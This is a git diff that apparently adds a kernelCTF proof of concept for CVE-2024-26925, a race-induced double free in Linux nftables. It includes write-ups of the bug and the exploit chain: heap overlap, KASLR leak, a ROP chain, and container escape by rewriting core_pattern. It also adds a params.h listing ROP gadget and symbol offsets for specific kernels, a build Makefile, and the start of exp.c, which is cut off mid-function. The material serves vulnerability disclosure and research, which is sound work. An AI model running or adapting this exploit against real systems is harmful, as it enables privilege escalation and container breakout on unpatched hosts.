diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md new file mode 100644 index 000000000..0021cf405 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md @@ -0,0 +1,178 @@ +# Exploit details +The vulnerability is a locking issue that resides in __nf_tables_abort() during the call to nf_tables_module_autoload(), +which releases the mutex lock and causes GC sequence protection to be bypassed. To exploit this vulnerability, +we must find a reliable way to race the abort thread and the set GC thread. By doing so, we can turn this locking +issue into a double-free primitive. + +## Module Autoload + +Since nftables object types (e.g., `nft_tunnel_obj_type`, `nft_quota_obj_type`, etc.) might reside in external kernel modules, +encountering a type currently not present in nftables will first add the typename to `nft_net->module_list` and attempt +to load the corresponding type's kernel module during the abort phase via `nf_tables_module_autoload()`. + +Therefore, `nf_tables_module_autoload()` can be triggered by requesting a non-existent object type in a batch commit. + +```c +static const struct nft_object_type * +nft_obj_type_get(struct net *net, u32 objtype, u8 family) +{ + const struct nft_object_type *type; + + rcu_read_lock(); + type = __nft_obj_type_get(objtype, family); + + // ... + +#ifdef CONFIG_MODULES + if (type == NULL) { // if type does not exist + if (nft_request_module(net, "nft-obj-%u", objtype) == -EAGAIN) + return ERR_PTR(-EAGAIN); + } +#endif + return ERR_PTR(-ENOENT); +} +``` + +```c +__printf(2, 3) int nft_request_module(struct net *net, const char *fmt, ...) +{ + // ... + + nft_net = nft_pernet(net); + list_for_each_entry(req, &nft_net->module_list, list) { + if (!strcmp(req->module, module_name)) { + if (req->done) + return 0; + + /* A request to load this module already exists. 
*/ + return -EAGAIN; + } + } + + req = kmalloc(sizeof(*req), GFP_KERNEL); + if (!req) + return -ENOMEM; + + req->done = false; + strscpy(req->module, module_name, MODULE_NAME_LEN); + list_add_tail(&req->list, &nft_net->module_list); // add to request list + + return -EAGAIN; +} +``` + +## Race to Double Free + +With this vulnerability, we can make the set GC procedure record the GC sequence and acquire the mutex lock +within the call to `__nf_tables_abort()` to bypass the GC sequence check. The goal is to free +the same set element twice during the handling of a batch commit. + +The race process is as follows: +- New `setelem A` +- New unknown type object (trigger `__nf_tables_abort()`) + - `nft_rhash_gc()` records expired `setelem A` + - `setelem A` is unlinked from the set and `kfree`'d + - module autoload releases mutex lock + - `nft_trans_gc_work_done()` acquires mutex lock, bypassing GC sequence check + - `setelem A` is `kfree`'d a second time + +To increase the success rate of the race (and capture the kernelctf slot), we need to enlarge the two time windows in the race process: +1. For the GC thread, we want its timer to wake up and record `setelem A` after `__nf_tables_abort()` starts but before `setelem A` is removed from the set. Otherwise, `setelem A` cannot be recorded. +2. The module loading time should be long enough to ensure that `nft_trans_gc_work_done()` can acquire the mutex lock. + +To delay the removal of `setelem A` in `__nf_tables_abort()` from the set, we can add many operations after the creation of +`setelem A` in the batch commit. Since `__nf_tables_abort()` processes batch commit operations in reverse order, +these operations will be processed before removing `setelem A`. + +In order to maximize this delay, we pre-allocate multiple anonymous sets (`NFT_SET_MAP`) with many elements, +reference them through `dynset` expressions, and delete these expressions via `NFT_MSG_DELRULE` at the end of the batch commit. 
+This ensures that `nft_map_activate()` is called to traverse all set elements during the abort process, delaying the removal of `setelem A`. + +For the module autoload part, since all types waiting for autoload will not be removed from `nft_net->module_list` +even after autoloading finishes, and `nf_tables_module_autoload()` will always try to load the type in the list without +checking if `req->done` is set, each autoload trigger will reload all previously autoloaded types. + +```c +static void nf_tables_module_autoload(struct net *net) +{ + struct nftables_pernet *nft_net = nft_pernet(net); + struct nft_module_request *req, *next; + LIST_HEAD(module_list); + + list_splice_init(&nft_net->module_list, &module_list); + mutex_unlock(&nft_net->commit_mutex); + list_for_each_entry_safe(req, next, &module_list, list) { + request_module("%s", req->module); + req->done = true; + } + mutex_lock(&nft_net->commit_mutex); + list_splice(&module_list, &nft_net->module_list); +} +``` + +Therefore, we only need to attempt autoloading non-existent and non-repeating object types N times before +the new `setelem A` operation. Finally, triggering autoload with a non-existent object type after the new `setelem A` will trigger `request_module()` N+1 times. + +With the above adjustments, the batch commit used in the exploit includes the following operations: +- New unknown type object (1) +- ... +- New unknown type object (N) +- New `setelem A` (kmalloc-cg-256) +- Delete all dynset expressions (deactivate all pre-allocated setelems) +- New unknown type object (N+1) + +By extending the two race windows mentioned above, we should be able to reliably trigger the race condition and cause a double free, right? + +Actually, **no**. We were surprised to find that even if we extend the processing time of pre-allocated set elements to the scale of seconds, +`nft_rhash_gc()` still doesn't race with `__nf_tables_abort()`. 
+ +We later found that for some reason, `nft_rhash_gc()` will not be scheduled by `system_power_efficient_wq` during high CPU usage. + +```c +static void nft_rhash_gc_init(const struct nft_set *set) +{ + struct nft_rhash *priv = nft_set_priv(set); + + queue_delayed_work(system_power_efficient_wq, &priv->gc_work, + nft_set_gc_interval(set)); +} +``` + +In our case, re-activating all pre-allocated set elements +in `__nf_tables_abort()` will cause high CPU usage, thus `nft_rhash_gc()` will not be scheduled. +To solve this problem, we switch the main thread to a different CPU using `set_cpu()` before the race. +Additionally, this provides a bonus: the slab allocator will not detect our double free because the same object is freed by two different CPUs. + +Once we can reliably trigger the race to cause double free, the free list in kmalloc-cg-256 will be `[A, A]`. + +## KASLR Bypass + +After obtaining the double free primitive, I used the same exploit method as in [CVE-2023-4004](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md). +Since there are now two elements A that have been double freed in the kmalloc-cg-256 free list, we can overlap `nft_table`'s `table->udata` with the `nft_object` object to leak `obj->ops` (address of `nft_ct_expect_obj_ops`). +- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256) +- New `object B` (`nft_ct_expect_obj`) +- Dump `table A` (leaking `object B` structure) + +After leaking the kernel address, restore the free list state to `[A, B, A]` to facilitate subsequent operations. + +## Control RIP + +At this stage, we again overlap `nft_table`'s `table->udata` with the `nft_object` object to control the `obj->ops` function table pointer, thereby controlling the RIP. + +We will first leak kernel heap address which we used to store fake `obj->ops` function pointer table. 
+- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256) +- New `table B` (with `NFTA_TABLE_USERDATA` data length equals 256) +- New `object C` (providing `NFTA_OBJ_USERDATA`, later used for faking `obj->ops`) +- Dump `table A` (leaking `obj->udata`) + +Then reallocate the table to modify the overlapped `object C` and call `obj->ops->dump` to trigger the ROP chain +- Delete `table A` +- New `table D` (setting `obj->ops` to `obj->udata`, setting ROP chain) +- Dump `object C` (triggering ROP chain) + +## Container Escape + +We reuse the exploit technique from [CVE-2023-4622](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md#achieve-container-escape). + +By rewriting `core_pattern` to `|/proc/%P/fd/` and placing the binary in the corresponding fd via `memfd_create()`, +we can execute any binary outside the container when a coredump is triggered. diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md new file mode 100644 index 000000000..6625aaa1b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md @@ -0,0 +1,174 @@ +# Vulnerability Details +A locking issue was found in the Linux kernel netfilter/nftables subsystem (`net/netfilter/nf_tables_api.c`). +It breaks an assumption made by the asynchronous set GC, which can be used to cause a double free. + +The asynchronous set GC (`nft_rhash_gc` for example) does not acquire the commit lock while doing its work; +instead, it uses the GC sequence (`gc_seq`) mechanism to protect itself from racing with a transaction. +At the beginning of `nft_rhash_gc`, it saves the current GC sequence and allocates a GC transaction +to store information, then traverses the set to record all expired set elements into the GC transaction, +and finally calls `nft_trans_gc_queue_async_done(gc)`. + +```c +static void nft_rhash_gc(struct work_struct *work) +{ + // ... 
+ gc_seq = READ_ONCE(nft_net->gc_seq); // save GC sequence + + if (nft_set_gc_is_pending(set)) + goto done; + + gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL); + if (!gc) + goto done; + + // ... + while ((he = rhashtable_walk_next(&hti))) { + // check if setelem expired + if (!nft_set_elem_expired(&he->ext)) + continue; + + // ... + nft_trans_gc_elem_add(gc, he); + } + + if (gc) + nft_trans_gc_queue_async_done(gc); + + // ... +} +``` + +The function `nft_trans_gc_queue_async_done(gc)` saves the GC transaction into a global list and eventually schedules +`nft_trans_gc_work()` to run. `nft_trans_gc_work()` then retrieves the GC transaction and calls `nft_trans_gc_work_done()` +to perform the check on the GC sequence. + +```c +static void nft_trans_gc_work(struct work_struct *work) +{ + // ... + list_for_each_entry_safe(trans, next, &trans_gc_list, list) { + list_del(&trans->list); + if (!nft_trans_gc_work_done(trans)) { // do the check here + nft_trans_gc_destroy(trans); + continue; + } + call_rcu(&trans->rcu, nft_trans_gc_trans_free); + } +} +``` + +The function `nft_trans_gc_work_done()` first acquires the commit lock and compares the saved GC sequence +with the current GC sequence. If they differ, the GC raced with a transaction: all critical sections +that modify the control plane are surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()`, which both increase +the current GC sequence (`nft_net->gc_seq`). In that case the state of the set may have changed, +and the function returns false to stop processing this GC transaction. + + +```c +static bool nft_trans_gc_work_done(struct nft_trans_gc *trans) +{ + struct nftables_pernet *nft_net; + struct nft_ctx ctx = {}; + + nft_net = nft_pernet(trans->net); + + mutex_lock(&nft_net->commit_mutex); // acquire global mutex + + /* Check for race with transaction, otherwise this batch refers to + * stale objects that might not be there anymore. 
Skip transaction if + * set has been destroyed from control plane transaction in case gc + * worker loses race. + */ + if (READ_ONCE(nft_net->gc_seq) != trans->seq || trans->set->dead) { // check gc sequence to prevent race + mutex_unlock(&nft_net->commit_mutex); + return false; + } + + ctx.net = trans->net; + ctx.table = trans->set->table; + + nft_trans_gc_setelem_remove(&ctx, trans); + mutex_unlock(&nft_net->commit_mutex); + + return true; +} +``` + +However, the GC sequence mechanism only works under the assumption that the commit lock is not released +during the critical section between `nft_gc_seq_begin()` and `nft_gc_seq_end()`. Otherwise, a GC thread +may record the expired object and obtain the released commit lock within the same `gc_seq`, thus bypassing the GC sequence check. + +`__nf_tables_abort()` is the one that gets this wrong: the function is surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()`. +If it receives the action `NFNL_ABORT_AUTOLOAD`, `nf_tables_module_autoload()` is called to process the module requests. +However, that function releases the commit lock before processing the module requests, which breaks the assumption of the GC +sequence mechanism and leads to a double free. + +```c +static int nf_tables_abort(struct net *net, struct sk_buff *skb, + enum nfnl_abort_action action) +{ + gc_seq = nft_gc_seq_begin(nft_net); // gc_seq++ + ret = __nf_tables_abort(net, action); + nft_gc_seq_end(nft_net, gc_seq); // gc_seq++ + mutex_unlock(&nft_net->commit_mutex); + + return ret; +} + +static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action) +{ + // ... 
+ + if (action == NFNL_ABORT_AUTOLOAD) + nf_tables_module_autoload(net); // load modules + else + nf_tables_module_autoload_cleanup(net); + + return 0; +} + +static void nf_tables_module_autoload(struct net *net) +{ + struct nftables_pernet *nft_net = nft_pernet(net); + struct nft_module_request *req, *next; + LIST_HEAD(module_list); + + list_splice_init(&nft_net->module_list, &module_list); + mutex_unlock(&nft_net->commit_mutex); // BUG: release mutex lock inside GC sequence critical section + list_for_each_entry_safe(req, next, &module_list, list) { + request_module("%s", req->module); + req->done = true; + } + mutex_lock(&nft_net->commit_mutex); + list_splice(&module_list, &nft_net->module_list); +} +``` + +## Requirements to trigger the vulnerability +- Capabilities: `CAP_NET_ADMIN` capability is required. +- Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES` +- User namespace: As this vulnerability requires `CAP_NET_ADMIN`, which is not usually given to normal users, we use an unprivileged user namespace to obtain this capability. + +## Commit which introduced the vulnerability +- The vulnerability was introduced in Linux v6.5, with commit [720344340fb9be2765bbaab7b292ece0a4570eae](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=720344340fb9be2765bbaab7b292ece0a4570eae) +- An incomplete fix to the new GC transaction API introduced this vulnerability. + +## Commit which fixed the vulnerability +- The vulnerability was fixed in Linux v6.9-rc3, with commit [0d459e2ffb541841714839e8228b845458ed3b27](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d459e2ffb541841714839e8228b845458ed3b27) +- The commit moves the call to `nf_tables_module_autoload()` after `nft_gc_seq_end()` to fix the check. 
+ +## Affected kernel versions +- Linux versions v6.5 ~ v6.9-rc2 are affected by this vulnerability +- For LTS versions + - v5.15.134 ~ + - v6.1.56 ~ + +## Affected component, subsystem +- netfilter/nf_tables + +## Cause (UAF, BoF, race condition, double free, refcount overflow, etc) +- A locking issue leads to a double free + +## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? (If there is any easy way to block it.) +- Disabling the syscalls used by the netfilter (specifically, nftables) subsystem (e.g. `socket`, `sendmsg` with a netlink socket) prevents this vulnerability. +- Disabling the syscalls for unprivileged user namespaces (e.g. `clone`, `unshare`) reduces the attack surface, since the netfilter subsystem requires `CAP_NET_ADMIN` to use. diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile new file mode 120000 index 000000000..75cfe352b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile @@ -0,0 +1 @@ +../lts-6.1.81/Makefile \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz new file mode 120000 index 000000000..d8246344b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz @@ -0,0 +1 @@ +../lts-6.1.81/deps.tar.gz \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c new file mode 120000 index 000000000..aee5d5387 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c @@ -0,0 +1 @@ +../lts-6.1.81/exp.c \ No newline at end of file diff --git 
a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit new file mode 100755 index 000000000..4e04934ce Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h new file mode 100644 index 000000000..de73712ec --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h @@ -0,0 +1,16 @@ +#include +#include +size_t nft_ct_expect_obj_type = 0x271c120; +size_t nft_ct_expect_obj_ops = 0x1acba40; +size_t core_pattern = 0x259e7a0; +size_t rcu_read_unlock = 0x120127b; // Symbol '__rcu_read_unlock' not found. (use ret here) +size_t copy_from_user = 0x776520; +size_t delay_loop = 0x7d6c70; + +size_t pop_rdi = 0x81910; +size_t pop_rsi = 0x1a9d38; +size_t pop_rdx = 0x1a9725; +size_t pop_3 = 0x68158; // pop r12 ; pop rbp ; pop rbx ; ret +size_t pop_rsp_ret = 0x106deb; +size_t add_rsp_0x50 = 0x190786; // add rsp, 0x50 ; jmp 0xffffffff82203980 (ret) +size_t push_rsi_jmp_deref_rsi_0x39 = 0x8a2d27; // push rsi ; jmp qword ptr [rsi + 0x39] diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c new file mode 120000 index 000000000..0b1b7059b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c @@ -0,0 +1 @@ +../lts-6.1.81/root.c \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh new file mode 120000 index 000000000..6bda7800d --- /dev/null +++ 
b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh @@ -0,0 +1 @@ +../lts-6.1.81/run.sh \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h new file mode 120000 index 000000000..bb472ccd4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h @@ -0,0 +1 @@ +../lts-6.1.81/tools.h \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/Makefile b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/Makefile new file mode 100644 index 000000000..9a3a72b67 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/Makefile @@ -0,0 +1,19 @@ +all: exploit + +exploit: exp root + tar czf exp.tar.gz exp root + cp run.sh exploit + fallocate -l 512 exploit + dd if=exp.tar.gz of=exploit conv=notrunc oflag=append + rm exp.tar.gz exp root + +exp: exp.c params.h tools.h + tar xzf deps.tar.gz + gcc exp.c -static -Ldeps/lib -lnftnl -lmnl -lnl-3 -Ideps/include -o exp + rm -r deps + +root: root.c + gcc root.c -static -o root + +clean: + rm -f exploit exp root diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/deps.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/deps.tar.gz new file mode 100644 index 000000000..3e3024f68 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/deps.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exp.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exp.c new file mode 100644 index 000000000..131044e74 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/lts-6.1.81/exp.c @@ -0,0 +1,714 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include 
+#include +#include +#include +#include + +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include + +#include "tools.h" +#include "params.h" + +const unsigned blocking_set_cnt = 200; // fixed counts +const unsigned module_load_cnt = 200; // only needs it to be big enough +unsigned gc_interval = 100; +unsigned setelem_timeout = 350; + +char buffer[0x1000]; +char user_buf[] = "|/proc/%P/fd/666"; +size_t *leaked_data; +size_t kbase; +size_t fake_ops; + +void wait_gc() { + progress("wait for garbage collection"); + sleep(1); + done(); +} + +struct nftnl_table *new_table(const char *name) { + struct nftnl_table *t; + + t = nftnl_table_alloc(); + if (!t) + error("new_table"); + + nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, NFPROTO_IPV4); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + + return t; +} + +void add_dynset(struct nftnl_rule *r, const char *set) { + struct nftnl_expr *e; + e = nftnl_expr_alloc("dynset"); + if (!e) + error("new_expr"); + + nftnl_expr_set_str(e, NFTNL_EXPR_DYNSET_SET_NAME, set); + nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_OP, 0); + nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_SREG_KEY, NFT_REG32_00); + nftnl_expr_set_u32(e, NFTNL_EXPR_DYNSET_SREG_DATA, NFT_REG32_00); + nftnl_rule_add_expr(r, e); +} + +struct nftnl_rule *new_rule(const char *table, const char *chain) { + struct nftnl_rule *r = NULL; + + r = nftnl_rule_alloc(); + if (r == NULL) { + perror("OOM"); + exit(EXIT_FAILURE); + } + + nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table); + nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain); + nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, NFPROTO_IPV4); + return r; +} + +struct nftnl_obj *new_object(const char *table, const char *name) { + struct nftnl_obj *t; + + t = nftnl_obj_alloc(); + if (!t) + error("new_object"); + + nftnl_obj_set_u32(t, NFTNL_OBJ_FAMILY, NFPROTO_IPV4); + nftnl_obj_set_u32(t, 
NFTNL_OBJ_TYPE, NFT_OBJECT_CT_EXPECT); + nftnl_obj_set_str(t, NFTNL_OBJ_TABLE, table); + nftnl_obj_set_str(t, NFTNL_OBJ_NAME, name); + nftnl_obj_set_u8(t, NFTNL_OBJ_CT_EXPECT_L4PROTO, IPPROTO_TCP); + nftnl_obj_set_u8(t, NFTNL_OBJ_CT_EXPECT_SIZE, 0x41); + nftnl_obj_set_u16(t, NFTNL_OBJ_CT_EXPECT_DPORT, 0x4141); + nftnl_obj_set_u32(t, NFTNL_OBJ_CT_EXPECT_TIMEOUT, 0x41414141); + + return t; +} + +void nftnl_obj_nlmsg_build_simple_payload(struct nlmsghdr *nlh, + const char *table, const char *name, uint32_t type) { + mnl_attr_put_strz(nlh, NFTA_OBJ_TABLE, table); + mnl_attr_put_strz(nlh, NFTA_OBJ_NAME, name); + mnl_attr_put_u32(nlh, NFTA_OBJ_TYPE, htonl(type)); + mnl_attr_put_strz(nlh, NFTA_OBJ_DATA, "DATA"); +} + +struct nftnl_set *new_hash_set(const char *table, const char *name) { + struct nftnl_set *s = NULL; + + s = nftnl_set_alloc(); + if (!s) + error("new_set"); + + nftnl_set_set_str(s, NFTNL_SET_TABLE, table); + nftnl_set_set_u32(s, NFTNL_SET_FAMILY, NFPROTO_IPV4); + nftnl_set_set_str(s, NFTNL_SET_NAME, name); + nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, sizeof(uint32_t)); + nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13); + nftnl_set_set_u32(s, NFTNL_SET_ID, 1); + nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_MAP | NFT_SET_ANONYMOUS); + nftnl_set_set_u32(s, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); + nftnl_set_set_u32(s, NFTNL_SET_DATA_LEN, 4); + + return s; +} + +struct nftnl_set *new_rhash_set(const char *table, const char *name) { + struct nftnl_set *s = NULL; + + s = nftnl_set_alloc(); + if (!s) + error("new_set"); + + nftnl_set_set_str(s, NFTNL_SET_TABLE, table); + nftnl_set_set_u32(s, NFTNL_SET_FAMILY, NFPROTO_IPV4); + nftnl_set_set_str(s, NFTNL_SET_NAME, name); + nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, sizeof(uint32_t)); + nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13); + nftnl_set_set_u32(s, NFTNL_SET_ID, 1); + nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_MAP | NFT_SET_TIMEOUT); + nftnl_set_set_u32(s, NFTNL_SET_GC_INTERVAL, gc_interval); // default: 0 (1s) + 
nftnl_set_set_u32(s, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); + nftnl_set_set_u32(s, NFTNL_SET_DATA_LEN, 4); + + return s; +} + +struct nftnl_set_elem *new_setelem_key(int len, int key) { + struct nftnl_set_elem *e; + uint32_t flags = 0; + + e = nftnl_set_elem_alloc(); + if (!e) + error("new_setelem"); + + nftnl_set_elem_set_u32(e, NFTNL_SET_ELEM_KEY, key); + nftnl_set_elem_set(e, NFTNL_SET_ELEM_DATA, buffer, 4); // use the same as SET_DATA_LEN + nftnl_set_elem_set(e, NFTNL_SET_ELEM_USERDATA, buffer, len); + nftnl_set_elem_set(e, NFTNL_SET_ELEM_FLAGS, &flags, sizeof(flags)); + + return e; +} + +struct nftnl_set_elem *new_setelem_timeout(int len, int timeout) { + struct nftnl_set_elem *e; + uint32_t flags = 0; + + e = nftnl_set_elem_alloc(); + if (!e) + error("new_setelem"); + + nftnl_set_elem_set_u64(e, NFTNL_SET_ELEM_TIMEOUT, timeout); + nftnl_set_elem_set_u32(e, NFTNL_SET_ELEM_KEY, 0x4141); + nftnl_set_elem_set(e, NFTNL_SET_ELEM_DATA, buffer, 4); // use the same as SET_DATA_LEN + nftnl_set_elem_set(e, NFTNL_SET_ELEM_USERDATA, buffer, len); + nftnl_set_elem_set(e, NFTNL_SET_ELEM_FLAGS, &flags, sizeof(flags)); + + return e; +} + +struct nftnl_chain *new_chain(const char *table, const char *name) { + struct nftnl_chain *t; + t = nftnl_chain_alloc(); + if (!t) + error("new_chain"); + + nftnl_chain_set_str(t, NFTNL_CHAIN_TABLE, table); + nftnl_chain_set_str(t, NFTNL_CHAIN_NAME, name); + + return t; +} + +int leak_object_cb(const struct nlmsghdr *nlh, void *data) { + struct nftnl_table *t; + struct nlattr *nla[NFTA_TABLE_MAX+1] = {}; + struct nlattr *attr; + int len, attrlen; + + if (nlh->nlmsg_type == NLMSG_ERROR) { + error_s("received NLMSG_ERROR message"); + } + + attr = (struct nlattr *)((char *)nlh + nlmsg_total_size(sizeof(struct nfgenmsg))); + attrlen = nlh->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg)); + nla_parse(nla, NFTA_TABLE_MAX, attr, attrlen, NULL); + + if (!nla[NFTA_TABLE_USERDATA]) { + error_s("not received userdata"); + } + + free(leaked_data); 
+ len = nla_len(nla[NFTA_TABLE_USERDATA]); + leaked_data = malloc(len); + + nla_memcpy(leaked_data, nla[NFTA_TABLE_USERDATA], len); + hexdump(leaked_data, 0x40); + + // sanity check (obj->ops) + if (leaked_data[16] < 0xffffffff00000000UL) { + error_s("object leak failed"); + } + + return MNL_CB_OK; +} + +void recv_nft_reply(struct mnl_socket *nl) { + char buf[MNL_SOCKET_BUFFER_SIZE]; + + // filter error report + while (true) { + int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + if (ret < 0) { + error("mnl_socket_recvfrom"); + } else if (ret > 100) { + uint32_t type = NFTNL_OUTPUT_DEFAULT; + mnl_cb_run(buf, ret, seq, mnl_socket_get_portid(nl), leak_object_cb, &type); + break; + } + } +} + +void setup_block(struct mnl_socket *nl, const char *tablename, const char *chainname, const char *setname) { + struct nftnl_set *set; + struct nftnl_rule *rule; + struct nftnl_obj *obj; + struct nftnl_set_elem *setelem; + struct nlmsghdr *nlh; + struct mnl_nlmsg_batch *batch; + int ret, key = 0x10000; + + // use anonymous set + set = new_hash_set(tablename, setname); + rule = new_rule(tablename, chainname); + add_dynset(rule, setname); + + // maximum: 0x68000 + int bufsz = 0x68000; + setsockopt(mnl_socket_get_fd(nl), SOL_SOCKET, + SO_SNDBUF, &bufsz, sizeof(bufsz)); + + char *reqbuf = malloc(bufsz); + BATCH_BEGIN(batch, reqbuf, bufsz); + + // build blocking anonymous set + NEW_SET(batch, nlh, set); + + /* create a bunch of (9500) setelem to delay */ + /* compress batch request to save some time */ + // total batch size should < 0x68000 + for (int i = 0; i < 19; ++i) { + set = new_hash_set(tablename, setname); + // single request size should < 0x10000 + for (int j = 0; j < 500; ++j) { + setelem = new_setelem_key(1, key++); + nftnl_set_elem_add(set, setelem); + } + + NEW_SETELEM(batch, nlh, set); + nftnl_set_free(set); + } + + // build rule to ref anonymous set + NEW_RULE(batch, nlh, rule); + + BATCH_END_SEND(batch, nl); + + free(reqbuf); +} + +size_t exploit_vuln(struct 
mnl_socket *nl, const char *tablename) { + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct mnl_nlmsg_batch *batch; + struct nftnl_obj *obj; + struct nftnl_table *tables[2]; + struct nlmsghdr *nlh; + int ret; + + info("build fake obj->ops"); + + size_t *fake_ops = (size_t *)malloc(192); + memset(fake_ops, 0x41, 192); + + // [0] for rop chain on fake obj to pop off return value + fake_ops[0] = kbase + pop_rdi; + fake_ops[4] = kbase + push_rsi_jmp_deref_rsi_0x39; // ops->dump + fake_ops[6] = kbase + nft_ct_expect_obj_type; // ops->type + + BATCH_BEGIN(batch, buf, sizeof(buf)); + + for (int i = 0; i < 2; ++i) { + char name[0x20] = {0}; + sprintf(name, "tbl_%u", seq++); + tables[i] = new_table(name); + nftnl_table_set_data(tables[i], NFTNL_TABLE_USERDATA, buffer, 256); + NEW_TABLE(batch, nlh, tables[i]); + } + + // should <= 192 since atm there's only corrupted entry left + obj = new_object(tablename, "leak_rop_obj"); + nftnl_obj_set_data(obj, NFTNL_OBJ_USERDATA, fake_ops, 192); + NEW_OBJ(batch, nlh, obj); + + BATCH_END_SEND(batch, nl); + + nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETTABLE, NFPROTO_IPV4, + NLM_F_ACK, seq); // do not update seq number here + nftnl_table_nlmsg_build_payload(nlh, tables[0]); + + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + error("mnl_socket_sendto"); + } + + recv_nft_reply(nl); + + size_t *fake_obj = leaked_data; + size_t fake_ops_addr = leaked_data[9]; + info("leak kheap: 0x%lx", fake_ops_addr); + + // deallocate object by freeing table + info("deallocate object"); + + 